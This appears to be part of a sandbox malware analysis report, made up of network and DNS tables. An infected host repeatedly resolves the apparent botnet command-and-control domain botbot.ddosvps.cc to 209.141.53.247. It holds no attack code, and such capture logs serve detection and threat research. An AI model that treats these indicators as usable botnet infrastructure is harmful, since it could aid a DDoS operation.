Jul 2, 2024 18:15:07.984731913 CEST	53	40256	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:09.592943907 CEST	36543	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:09.595204115 CEST	45993	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:09.599952936 CEST	53	36543	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:09.602031946 CEST	53	45993	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:11.201966047 CEST	52994	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:11.203197956 CEST	53101	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:11.210028887 CEST	53	52994	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:11.211251974 CEST	53	53101	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:12.829972029 CEST	56703	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:12.830106974 CEST	38172	53	192.168.2.14	8.8.8.8
Jul 2, 2024 18:15:12.836824894 CEST	53	38172	8.8.8.8	192.168.2.14
Jul 2, 2024 18:15:12.837107897 CEST	53	56703	8.8.8.8	192.168.2.14

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 18:13:13.965816975 CEST	192.168.2.14	8.8.8.8	0x8b90	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:13.970102072 CEST	192.168.2.14	8.8.8.8	0x170	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:15.599849939 CEST	192.168.2.14	8.8.8.8	0xdbb3	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:15.603288889 CEST	192.168.2.14	8.8.8.8	0x6b2c	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:17.234371901 CEST	192.168.2.14	8.8.8.8	0xc31	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:17.236331940 CEST	192.168.2.14	8.8.8.8	0x7369	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:18.839168072 CEST	192.168.2.14	8.8.8.8	0xa416	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:18.839356899 CEST	192.168.2.14	8.8.8.8	0xd7ab	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:20.561141968 CEST	192.168.2.14	8.8.8.8	0x1175	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:20.561332941 CEST	192.168.2.14	8.8.8.8	0xed48	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:22.389599085 CEST	192.168.2.14	8.8.8.8	0x94fb	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:22.389784098 CEST	192.168.2.14	8.8.8.8	0x7ad1	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:24.183620930 CEST	192.168.2.14	8.8.8.8	0x7987	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:24.186573982 CEST	192.168.2.14	8.8.8.8	0x702a	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:25.790604115 CEST	192.168.2.14	8.8.8.8	0x3702	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:25.793494940 CEST	192.168.2.14	8.8.8.8	0x11c5	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:27.399995089 CEST	192.168.2.14	8.8.8.8	0xa02f	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:27.400171041 CEST	192.168.2.14	8.8.8.8	0xfc61	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:29.031352997 CEST	192.168.2.14	8.8.8.8	0x1c47	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:29.032651901 CEST	192.168.2.14	8.8.8.8	0xa206	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:30.636538029 CEST	192.168.2.14	8.8.8.8	0xafb1	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:30.640352011 CEST	192.168.2.14	8.8.8.8	0x349a	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:32.284136057 CEST	192.168.2.14	8.8.8.8	0x20d5	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:32.284405947 CEST	192.168.2.14	8.8.8.8	0x73f3	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:33.886480093 CEST	192.168.2.14	8.8.8.8	0x3868	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:33.886775017 CEST	192.168.2.14	8.8.8.8	0xef6	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:35.498083115 CEST	192.168.2.14	8.8.8.8	0x51ab	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:35.501064062 CEST	192.168.2.14	8.8.8.8	0x26da	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:37.126235962 CEST	192.168.2.14	8.8.8.8	0x241b	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:37.127691984 CEST	192.168.2.14	8.8.8.8	0xcaf0	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:38.730803967 CEST	192.168.2.14	8.8.8.8	0x55e3	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:38.730997086 CEST	192.168.2.14	8.8.8.8	0xc9f6	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:40.587814093 CEST	192.168.2.14	8.8.8.8	0xfd74	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:40.588150978 CEST	192.168.2.14	8.8.8.8	0x92f2	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:42.215075970 CEST	192.168.2.14	8.8.8.8	0x9529	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:42.215372086 CEST	192.168.2.14	8.8.8.8	0xc77c	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:43.828629971 CEST	192.168.2.14	8.8.8.8	0x5e5c	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:43.831918955 CEST	192.168.2.14	8.8.8.8	0xb576	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:45.472801924 CEST	192.168.2.14	8.8.8.8	0x80db	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:45.474287987 CEST	192.168.2.14	8.8.8.8	0xd9a3	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:47.253124952 CEST	192.168.2.14	8.8.8.8	0xcc44	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:47.254839897 CEST	192.168.2.14	8.8.8.8	0x9105	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:48.874876976 CEST	192.168.2.14	8.8.8.8	0xd087	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:48.875174046 CEST	192.168.2.14	8.8.8.8	0x1af4	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:50.498800039 CEST	192.168.2.14	8.8.8.8	0x3016	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:50.502166033 CEST	192.168.2.14	8.8.8.8	0x4798	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:52.119829893 CEST	192.168.2.14	8.8.8.8	0x390e	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:52.122286081 CEST	192.168.2.14	8.8.8.8	0x96a2	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:53.729948044 CEST	192.168.2.14	8.8.8.8	0x7c39	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:53.730173111 CEST	192.168.2.14	8.8.8.8	0x83ba	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:55.477740049 CEST	192.168.2.14	8.8.8.8	0x8213	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:55.477972031 CEST	192.168.2.14	8.8.8.8	0xafbe	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:57.110788107 CEST	192.168.2.14	8.8.8.8	0x6bbb	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:57.110987902 CEST	192.168.2.14	8.8.8.8	0x39c3	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:58.734031916 CEST	192.168.2.14	8.8.8.8	0x857a	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:13:58.734297037 CEST	192.168.2.14	8.8.8.8	0x77d5	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:00.357702017 CEST	192.168.2.14	8.8.8.8	0xda3	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:00.360876083 CEST	192.168.2.14	8.8.8.8	0x7a31	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:01.974080086 CEST	192.168.2.14	8.8.8.8	0x3e09	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:01.974289894 CEST	192.168.2.14	8.8.8.8	0xeb01	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:03.608968973 CEST	192.168.2.14	8.8.8.8	0xd91c	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:03.609153986 CEST	192.168.2.14	8.8.8.8	0xb422	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:05.230693102 CEST	192.168.2.14	8.8.8.8	0x64a4	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:05.233939886 CEST	192.168.2.14	8.8.8.8	0xac09	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:06.858468056 CEST	192.168.2.14	8.8.8.8	0x6635	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:06.858683109 CEST	192.168.2.14	8.8.8.8	0x36bb	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:08.489779949 CEST	192.168.2.14	8.8.8.8	0xd283	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:08.489984989 CEST	192.168.2.14	8.8.8.8	0xc048	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:10.104021072 CEST	192.168.2.14	8.8.8.8	0xac73	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:10.104254961 CEST	192.168.2.14	8.8.8.8	0xfb6b	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:11.733099937 CEST	192.168.2.14	8.8.8.8	0x199a	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:11.733323097 CEST	192.168.2.14	8.8.8.8	0xc1d6	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:13.340761900 CEST	192.168.2.14	8.8.8.8	0x18bb	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:13.340980053 CEST	192.168.2.14	8.8.8.8	0x4f76	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:14.950051069 CEST	192.168.2.14	8.8.8.8	0x1861	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:14.950278044 CEST	192.168.2.14	8.8.8.8	0x750a	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:16.590183973 CEST	192.168.2.14	8.8.8.8	0x9d9e	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:16.591769934 CEST	192.168.2.14	8.8.8.8	0x6d18	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:18.216202974 CEST	192.168.2.14	8.8.8.8	0x2110	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:18.216485977 CEST	192.168.2.14	8.8.8.8	0xad62	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:19.847203016 CEST	192.168.2.14	8.8.8.8	0x473e	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:19.848803997 CEST	192.168.2.14	8.8.8.8	0x8606	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:21.463753939 CEST	192.168.2.14	8.8.8.8	0x569a	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:21.463831902 CEST	192.168.2.14	8.8.8.8	0xe537	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:23.243113995 CEST	192.168.2.14	8.8.8.8	0x54a5	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:23.243412971 CEST	192.168.2.14	8.8.8.8	0x407d	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:24.859894037 CEST	192.168.2.14	8.8.8.8	0x70e9	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:24.860177040 CEST	192.168.2.14	8.8.8.8	0xcc96	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:26.478758097 CEST	192.168.2.14	8.8.8.8	0x7f35	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:26.478929996 CEST	192.168.2.14	8.8.8.8	0x8082	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:28.096065044 CEST	192.168.2.14	8.8.8.8	0x1b2c	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:28.096239090 CEST	192.168.2.14	8.8.8.8	0x43c7	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:29.717561960 CEST	192.168.2.14	8.8.8.8	0x7baf	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:29.721471071 CEST	192.168.2.14	8.8.8.8	0xd216	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:31.363512993 CEST	192.168.2.14	8.8.8.8	0x1b03	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:31.364516020 CEST	192.168.2.14	8.8.8.8	0x5a88	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:32.979027033 CEST	192.168.2.14	8.8.8.8	0xc44f	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:32.979378939 CEST	192.168.2.14	8.8.8.8	0x1391	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:35.368033886 CEST	192.168.2.14	8.8.8.8	0x15b	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:35.372464895 CEST	192.168.2.14	8.8.8.8	0x5778	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:36.981350899 CEST	192.168.2.14	8.8.8.8	0x630f	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:36.982984066 CEST	192.168.2.14	8.8.8.8	0x9ab2	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:38.591532946 CEST	192.168.2.14	8.8.8.8	0xf5ac	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:38.591691971 CEST	192.168.2.14	8.8.8.8	0x4988	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:40.221297026 CEST	192.168.2.14	8.8.8.8	0xa4d2	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:40.221543074 CEST	192.168.2.14	8.8.8.8	0x72fc	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:41.823203087 CEST	192.168.2.14	8.8.8.8	0x46c0	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:41.823328018 CEST	192.168.2.14	8.8.8.8	0x7093	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:43.438344002 CEST	192.168.2.14	8.8.8.8	0x40e8	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:43.440253019 CEST	192.168.2.14	8.8.8.8	0x5dc2	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:45.067749977 CEST	192.168.2.14	8.8.8.8	0x5822	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:45.069586992 CEST	192.168.2.14	8.8.8.8	0x5ea0	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:46.684108019 CEST	192.168.2.14	8.8.8.8	0x7d52	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:46.685575008 CEST	192.168.2.14	8.8.8.8	0x224e	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:48.291810989 CEST	192.168.2.14	8.8.8.8	0x9e64	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:48.291954994 CEST	192.168.2.14	8.8.8.8	0x1830	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:49.921870947 CEST	192.168.2.14	8.8.8.8	0xea73	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:49.922724009 CEST	192.168.2.14	8.8.8.8	0x4e2a	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:51.532326937 CEST	192.168.2.14	8.8.8.8	0x8535	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:51.532469034 CEST	192.168.2.14	8.8.8.8	0x656d	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:53.172935009 CEST	192.168.2.14	8.8.8.8	0x1f1e	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:53.173187017 CEST	192.168.2.14	8.8.8.8	0x22dc	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:54.794234037 CEST	192.168.2.14	8.8.8.8	0xbb78	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:54.794329882 CEST	192.168.2.14	8.8.8.8	0xae7a	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:56.436242104 CEST	192.168.2.14	8.8.8.8	0xb01	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:56.438051939 CEST	192.168.2.14	8.8.8.8	0xb3de	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:58.044667959 CEST	192.168.2.14	8.8.8.8	0x8a89	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:58.044775009 CEST	192.168.2.14	8.8.8.8	0xc89e	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:14:59.668982029 CEST	192.168.2.14	8.8.8.8	0x42d4	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:14:59.673352957 CEST	192.168.2.14	8.8.8.8	0x6618	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:15:01.315491915 CEST	192.168.2.14	8.8.8.8	0x8637	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:01.316277027 CEST	192.168.2.14	8.8.8.8	0xa267	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:15:02.917653084 CEST	192.168.2.14	8.8.8.8	0x9a76	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:15:02.917815924 CEST	192.168.2.14	8.8.8.8	0x3008	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:04.526885986 CEST	192.168.2.14	8.8.8.8	0x7414	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:04.529916048 CEST	192.168.2.14	8.8.8.8	0x1965	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:15:06.334883928 CEST	192.168.2.14	8.8.8.8	0xa4ba	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:15:06.335557938 CEST	192.168.2.14	8.8.8.8	0xdcdb	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:07.978025913 CEST	192.168.2.14	8.8.8.8	0xc588	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:15:07.978202105 CEST	192.168.2.14	8.8.8.8	0xe3d7	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:09.592943907 CEST	192.168.2.14	8.8.8.8	0x65f8	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:09.595204115 CEST	192.168.2.14	8.8.8.8	0xaeca	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:15:11.201966047 CEST	192.168.2.14	8.8.8.8	0xc17a	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:15:11.203197956 CEST	192.168.2.14	8.8.8.8	0x91b4	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:15:12.829972029 CEST	192.168.2.14	8.8.8.8	0x3fd8	Standard query (0)	botbot.ddosvps.cc	28	IN (0x0001)	false
Jul 2, 2024 18:15:12.830106974 CEST	192.168.2.14	8.8.8.8	0x73b4	Standard query (0)	botbot.ddosvps.cc	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 18:13:13.972325087 CEST	8.8.8.8	192.168.2.14	0x8b90	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:15.606826067 CEST	8.8.8.8	192.168.2.14	0xdbb3	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:17.243083000 CEST	8.8.8.8	192.168.2.14	0x7369	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:18.847155094 CEST	8.8.8.8	192.168.2.14	0xd7ab	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:20.768111944 CEST	8.8.8.8	192.168.2.14	0xed48	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:22.397608042 CEST	8.8.8.8	192.168.2.14	0x7ad1	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:24.191035986 CEST	8.8.8.8	192.168.2.14	0x7987	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:25.797593117 CEST	8.8.8.8	192.168.2.14	0x3702	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:27.407010078 CEST	8.8.8.8	192.168.2.14	0xfc61	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:29.042182922 CEST	8.8.8.8	192.168.2.14	0xa206	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:30.644788027 CEST	8.8.8.8	192.168.2.14	0xafb1	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:32.291096926 CEST	8.8.8.8	192.168.2.14	0x73f3	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:33.893867016 CEST	8.8.8.8	192.168.2.14	0xef6	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:35.505729914 CEST	8.8.8.8	192.168.2.14	0x51ab	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:37.134458065 CEST	8.8.8.8	192.168.2.14	0xcaf0	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:38.737591982 CEST	8.8.8.8	192.168.2.14	0xc9f6	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:40.612868071 CEST	8.8.8.8	192.168.2.14	0x92f2	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:42.221856117 CEST	8.8.8.8	192.168.2.14	0xc77c	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:43.839958906 CEST	8.8.8.8	192.168.2.14	0xb576	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:45.479717970 CEST	8.8.8.8	192.168.2.14	0x80db	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:47.261749029 CEST	8.8.8.8	192.168.2.14	0x9105	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:48.881614923 CEST	8.8.8.8	192.168.2.14	0x1af4	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:50.505928993 CEST	8.8.8.8	192.168.2.14	0x3016	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:52.129133940 CEST	8.8.8.8	192.168.2.14	0x96a2	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
Jul 2, 2024 18:13:53.737016916 CEST	8.8.8.8	192.168.2.14	0x83ba	No error (0)	botbot.ddosvps.cc	209.141.53.247	A (IP address)	IN (0x0001)	false
